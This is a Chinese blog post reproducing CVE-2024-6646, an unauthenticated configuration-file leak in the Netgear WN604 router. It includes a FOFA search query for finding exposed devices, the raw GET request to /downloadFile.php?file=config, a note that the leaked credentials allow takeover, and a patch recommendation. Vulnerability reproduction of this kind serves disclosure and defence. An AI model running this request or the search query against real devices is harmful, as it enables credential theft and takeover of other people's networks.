Netgear-WN604 downloadFile.php 信息泄露复现(CVE-2024-6646)

于 2024-10-03 23:50:37 发布
阅读量163 收藏 1
点赞数 11
分类专栏: 漏洞复现 文章标签: php 开发语言 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xc_214/article/details/142697835
版权

0x01 产品描述:

        NETGEAR WN604是一款功能强大的双频AC1200无线路由器,非常适合中大型家庭和企业使用。它支持最新的802.11ac无线标准,能提供高达1200Mbps的无线传输速度。路由器具备千兆有线网口和3个100Mbps有线网口,可满足有线和无线设备的接入需求。此外,它还内置了QoS、访问控制、加密等高级安全和管理功能,可以确保网络的稳定性和安全性。凭借NETGEAR Genie app,用户还可以方便地远程管理和监控路由器。

0x02 漏洞描述:

     Netgear的WN604产品存在一个漏洞,该漏洞存在于Web界面的某个未知功能中,影响文件为/downloadFile.php。通过操纵带有输入配置的参数文件,攻击者可以获取敏感信息。该攻击可能远程发起,获取配置文件中用户名密码,从而登录接管系统。

0x03 影响版本:

Netgear wn系列

0x04 搜索语句:

Fofa:title=="Netgear"

0x05 漏洞复现:

通过downloadFile.php获取配置文件数据

GET /downloadFile.php?file=config HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

 通过配置文件泄漏的用户名密码进行登录

0x06 修复建议:

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

https://www.netgear.com/uk

iSee857
关注
专栏目录
Netgear WN604 downloadFile.php 信息泄露漏洞复现(CVE-2024-6646)
0xSec
07-14 806
Netgear WN604 downloadFile.php接口处存在信息泄露漏洞,文件身份验证的远程攻击者可以利用此漏洞获取无线路由器的管理员账号密码信息,导致路由器后台被控,攻击者可对无线网络发起破坏或进一步威胁。
Linksys RE7000无线扩展器 RCE漏洞复现(CVE-2024-25852)
0xSec
04-20 866
Linksys RE7000无线扩展器在访问控制功能点的“AccessControlList”参数中存在命令执行漏洞。未经身份验证的远程攻击者可以利用该漏洞获取设备管理员权限。
Netgear R6700v3 1.0.4.102(CVE-2021-27239)
re1wn
10-02 505
首先明确的是我知道漏洞点在何处,所以先看漏洞点所在函数的函数调用图,找到如何从main函数到此函数并触发漏洞。此漏洞产生的本质是strncpy拷贝的最大长度,错误用法是这个长度取决于输入,所以会造成栈溢出,正确用法应该是取决于要拷贝到的地方的大小。根据本poc,偏移是140比之前找到的偏移136多4,找到的偏移与最终使用的偏移不同,这是1个保留的问题。这句考虑了2点:1、分析IDA反汇编的c代码可以,strncpy复制的长度是MX:与\r\n之间的内容的长度,长度是这个,内容也是这个,所以必加。
【漏洞复现】SOAP WSDL解析器代码注入漏洞(CVE-2017-8759)
VI___
01-10 4730
一、CVE-2017-8759 ——类型:.NET Framework漏洞 https://www.freebuf.com/articles/system/147602.html 二、准备 攻击机:kali-2019 192.168.75.149 靶机:win7_x86(关闭防火墙) 192.168.75.139 三、复现过程 1、下载 exp,并将 cm...
熊海博客php版本,xhcms_v1.0 熊海CMS是由熊海开发的一款可广泛应用于个人博客 联合开发网 - pudn.com...
weixin_30126739的博客
04-02 247
xhcms_v1.0所属分类:WEB开发开发工具:Java文件大小:4002KB下载次数:3上传日期:2015-05-14 14:41:13上 传 者:dou说明:熊海CMS是由熊海开发的一款可广泛应用于个人博客,个人网站,企业网站的一套网站综合管理系统。适用于个人博客、个人网站、企业网站等各种用途,前台采用电脑、移动端两种显示模式,后台使用HML5响应式布局。目前系统已经集成:代码高亮、广告...
{工作记录}遇到过的网络攻击合集&&爬虫User-Agent记录..{持续更新}
mikumiku~
05-01 7111
奇怪的攻击增加了!Exp!up!up! 奇怪的攻击记录_(:з」∠)_ “虽然看不懂是啥攻击,但是记下来感觉会有点用处。”——harusaruhi
梅林rpc服务器用户名密码,网件(NETGEAR)路由器默认密码_初始密码_用户名密码-192路由网...
热门推荐
weixin_34901243的博客
08-01 1万+
美国网件(NETGEAR)路由器的默认密码是多少?网件(NETGEAR)路由器的初始密码是多少?网件(NETGEAR)路由器的用户名和密码是多少?经常有用户问这类问题,下面小编来告诉大家,如何获取网件(NETGEAR)路由器的默认密码。不知道大家注意到没有,在网件(NETGEAR)路由器的底部,贴有一个标签(铭牌);在这个标签上,其实是写得有默认的用户名、密码的,如下图所示。查看网件(NETGEA...
openwrt编译报错“openwrt-ramips-mt7620-ex2700-squashfs-factory.bin: No such file or directory”
奔狼
03-26 3277
编译openwrt的18.06的时候报了下面的错误: openwrt-ramips-mt7620-ex2700-squashfs-factory.bin: No such file or directory 实际是这个错误: WARNING: Image file /home/even/openwrt-18.06.1/build_dir/target-mipsel_24kc_musl/linux...
php更新用户数据为空,php - 使用PHP更新数据库,而没有来自HTML表单的空值 - SO中文参考 - www.soinside.com...
weixin_30126739的博客
03-16 68
我想更新我的SQL数据库,但表单中没有空值。那就是我所拥有的:if(isset($_POST['account_details_submit'])) {$user_id = array_values($_SESSION['user_info'])[9];$edited = date('d.m.Y h:i a');if(isset($_POST['account_details_first_name...
NETGEAR-BZV_3.4.3.9-099.trx
10-04
测试机型:网件R6800,R6900V2MTK-7621AT机型。 博通CPU勿刷!博通CPU勿刷!博通CPU勿刷! 刷机之前请做好备份原,或者看清楚自己固件版,去官网下载同版本固件以备救砖。 刷机步骤: 下载nmrpflash.exe和WinPcap_4...
网件R7000Xwrt-Vortex最新386.5.2固件
07-10
有Aimesh功能,可以刷网件R7000/R6900,从384固件升级后,应该是Aimesh2.0版,与R6300v2互组mesh都实现了。 但恢复出厂设置后,再组Aimesh一直 不成功,Aimesh选项中拓扑图也没有了,无法添加节点,没有搞清楚。 此...
openwrt-ar71xx-generic-wndr3800-squashfs-sysupgrade.bin
08-16
lean 的19.7的openwrt 固件,适合netgear 3800 测试通过。 其中无线部分打了两个补丁才过去,其他功能没有。就是新
R9.12.31-4.14.162-openwrt-ar71xx-generic-wndr3800-squashfs-factory.img
04-10
wndr3800的openwrt最新版本,网件3800刷不死,可刷多种固件。石像鬼固件和汉化文件,lede固件,原厂固件。重刷固件
[NewStarCTF 2023 公开赛道]Begin of PHP1
alwtj的博客
09-26 495
LEVEL5: 哈哈又是数组绕过,这里要输入的POST内容不能是字母和数字,所以我们可以用数组,当然也可以不用只要输入的value为真且不是正则表达是匹配到的范围就可以了,flag5=. ,或者flag5[]=love。LEVEL1: 因为hash函数无法解析数组会返回false,直接用数组绕过key1[]=1&key2[]=2。LEVEL4: 没错继续用数组绕过,is_numeric()无法解析数组会返回false,而且数组大于2023.至于为什么大于2023,我们来做个小实验.key5[]=5。
PHP反序列化2(OC绕过.wakeup绕过)
2302_81328699的博客
09-26 579
PHP反序列化2(OC绕过.wakeup绕过)
Thinkphp/Laravel基于vue的少数民族民歌网络图书馆管理系统
abo2022的博客
09-30 1125
ThinkPHP是一个快速、简单的基于MVC和面向对象的轻量级PHP开发框架,遵循Apache2开源协议发布,从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,尤其注重开发体验和易用性,并且拥有众多的原创功能和特性,为WEB应用开发提供了强有力的支持Laravel非常的简洁并且是开源的,Laravel 是一个具有表现力、优雅语法的 Web 应用程序框架. Laravel 是构建现代全栈 Web 应用程序的最佳选择.
php socket客户端
qq_30754685的博客
09-30 271
在软件管理里面安装composer,再在网站管理安装扩展socket。使用的工具为phpstudy。
第168天:应急响应-ELK 日志分析系统&Yara规则&样本识别&特征提取&规则编写
最新发布
weixin_71529930的博客
09-30 940
案例一:ELK 搭建使用-导入文件&监控日志&语法筛选该软件是专业分析日志的工具,但是不支持安全软件的分析这里我是在kali中搭建的搭建参考文章:(第一篇成功,第二篇呢可能是国外的docker关闭了未成功)(本地搭建)(docker搭建)安装完成的界面三种模式选择日志上传上传文件导入命名并导入上传完成以后去查看可以根据不同类别去分类查看IP时间戳ua头这里看到呢ua头有个sqlmap直接定位搜索特征字符不是单独出现,需要在前后加上*
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

iSee857

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值